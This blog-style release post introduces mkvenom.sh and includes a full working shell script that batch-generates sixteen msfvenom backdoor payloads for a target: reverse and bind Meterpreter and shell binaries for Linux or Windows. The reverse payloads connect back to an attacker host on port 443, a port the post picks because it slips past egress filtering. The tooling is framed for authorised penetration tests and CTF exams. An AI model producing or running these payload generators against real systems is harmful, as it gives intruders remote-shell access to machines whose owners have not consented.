The popular Metasploit Framework includes a payload generation tool called msfvenom. It is generally used to create backdoor scripts or binaries that are run on a target computer once you have some way of executing code on it. During penetration tests, CTFs and exams (such as the OSCP) a lot of time can be spent typing out msfvenom commands and waiting for them to complete.
Today I am releasing mkvenom.sh: a Bash script which generates a selection of common Metasploit Framework msfvenom payloads for a specified target machine. The idea is to kick it off in the background while performing initial scanning/enumeration of a target, to speed up your penetration testing workflow (see also: ptboot.sh). It is a slow script and it is imprecise, but in some circumstances it can be a good time saver.
This Linux Bash script creates commonly used Metasploit Framework payloads such as reverse Meterpreter shells and bind shells, including 32-bit/64-bit and staged/inline variants. Staged payloads (for example meterpreter/reverse_tcp) are small stagers that download the rest of the payload from a matching multi/handler; inline (stageless) payloads (for example meterpreter_reverse_tcp) are larger but self-contained, so pick the handler payload that matches the file you run.
It will produce a directory called payloads containing a library of ready-to-use payload files, built using the local and remote TCP/IP parameters specified on the command line.
The only requirements are Metasploit Framework 4.16+ and the Bash shell. The script is intended for use in a Linux environment and was developed and tested on Kali Linux 2018.1.
Clone or download the mkvenom.sh file from this repository into your Linux environment. Consider placing it in /usr/local/bin (and marking it executable) so that it can be run regardless of the shell's current working directory.
A directory called payloads will be created in the current working directory when the script runs.
The command line usage syntax is illustrated by the following example. If the local penetration tester's system has an IP address of 192.168.10.200 and the remote Linux target has an IP address of 10.20.20.1:
/usr/local/bin/mkvenom.sh 10.20.20.1 4444 192.168.10.200 443 linux
In the above example, payloads which bind to a port on the target listen on port 4444, whilst payloads which make reverse connections back to the local machine connect to port 443. Port 443 is a sensible default for reverse connections because outbound HTTPS is rarely blocked by egress filtering, and the listener on 192.168.10.200 must be started with the same port and the same (staged or inline) payload.
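To make the generation matrix concrete, here is an added example of the same idea written from scratch; it is not the mkvenom.sh script itself. It builds the msfvenom command lines for the four reverse/bind, staged/inline, 32/64-bit combinations of Meterpreter and plain shell payloads, then runs them in the background so you can get on with enumeration. The Metasploit module names (linux/x64/meterpreter/reverse_tcp, windows/shell_bind_tcp and so on) and the msfvenom options -p, -f, -o, LHOST, LPORT and RHOST are real; the output file naming scheme, the function names and the choice of ELF for Linux and EXE for Windows are my own assumptions for this illustration.

```bash
#!/bin/sh
# Added example, not the original mkvenom.sh: build the msfvenom command lines
# for a 2 (arch) x 2 (meterpreter/shell) x 2 (staged/inline) x 2 (reverse/bind)
# matrix of TCP payloads and run them in the background.
# Usage: ./venom_batch.sh RHOST BINDPORT LHOST REVPORT {linux|windows}

# payload_name OS ARCH KIND STAGE DIRECTION -> Metasploit payload module path.
#   payload_name linux x64 meterpreter staged reverse -> linux/x64/meterpreter/reverse_tcp
#   payload_name windows x86 shell inline bind        -> windows/shell_bind_tcp
# Staged modules are written kind/handler, inline ones kind_handler, and the
# 32-bit Windows modules carry no architecture prefix.
payload_name() {
  local os=$1 arch=$2 kind=$3 stage=$4 dir=$5 prefix sep
  if [ "$os" = windows ] && [ "$arch" = x86 ]; then prefix="windows/"; else prefix="$os/$arch/"; fi
  if [ "$stage" = staged ]; then sep="/"; else sep="_"; fi
  printf '%s%s%s%s_tcp\n' "$prefix" "$kind" "$sep" "$dir"
}

# venom_cmds RHOST BINDPORT LHOST REVPORT OS -> one msfvenom command per line.
# Reverse payloads get LHOST/LPORT (where the target connects back to);
# bind payloads get LPORT (the port opened on the target) plus RHOST, which the
# bind_tcp handler accepts, so the file records which host it was built for.
# Output file names (payloads/OS_ARCH_KIND_DIRECTION_STAGE.FMT) are my own scheme.
venom_cmds() {
  local rhost=$1 bport=$2 lhost=$3 rport=$4 os=$5
  local fmt arch kind stage dir payload opts
  case "$os" in
    linux)   fmt=elf ;;
    windows) fmt=exe ;;
    *) echo "unsupported OS: $os (use linux or windows)" >&2; return 1 ;;
  esac
  for arch in x86 x64; do
    for kind in meterpreter shell; do
      for stage in staged inline; do
        for dir in reverse bind; do
          payload=$(payload_name "$os" "$arch" "$kind" "$stage" "$dir")
          if [ "$dir" = reverse ]; then
            opts="LHOST=$lhost LPORT=$rport"
          else
            opts="RHOST=$rhost LPORT=$bport"
          fi
          printf 'msfvenom -p %s %s -f %s -o payloads/%s_%s_%s_%s_%s.%s\n' \
            "$payload" "$opts" "$fmt" "$os" "$arch" "$kind" "$dir" "$stage" "$fmt"
        done
      done
    done
  done
}

# run_batch: write the command list, launch every msfvenom in the background
# (each one pays several seconds of Ruby start-up) and wait for all of them.
run_batch() {
  command -v msfvenom >/dev/null 2>&1 || { echo "msfvenom not found in PATH" >&2; return 1; }
  mkdir -p payloads || return 1
  list=$(mktemp) || return 1
  venom_cmds "$@" > "$list" || { rm -f "$list"; return 1; }
  while IFS= read -r cmd; do
    sh -c "$cmd" > /dev/null 2>&1 &
  done < "$list"
  wait
  rm -f "$list"
  echo "generated $(ls payloads | wc -l) files in ./payloads"
}

# Only start generating when the five parameters are given; with no arguments
# the script just defines the functions so it can be sourced by other scripts.
if [ "$#" -eq 5 ]; then
  run_batch "$@"
elif [ "$#" -ne 0 ]; then
  echo "usage: $0 RHOST BINDPORT LHOST REVPORT {linux|windows}" >&2
  exit 1
fi
```

Run it as ./venom_batch.sh 10.20.20.1 4444 192.168.10.200 443 linux (the same parameter order as the mkvenom.sh example above) and sixteen files appear in ./payloads. Running venom_cmds on its own prints the command lines without executing anything, which is a quick way to check the LHOST/LPORT values before spending the generation time.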
Running this tool early in the enumeration phase means suitable MSF payloads will be ready and waiting for use when the time comes.
I have released this script under the MIT licence. It can be downloaded from the mkvenom GitHub repository.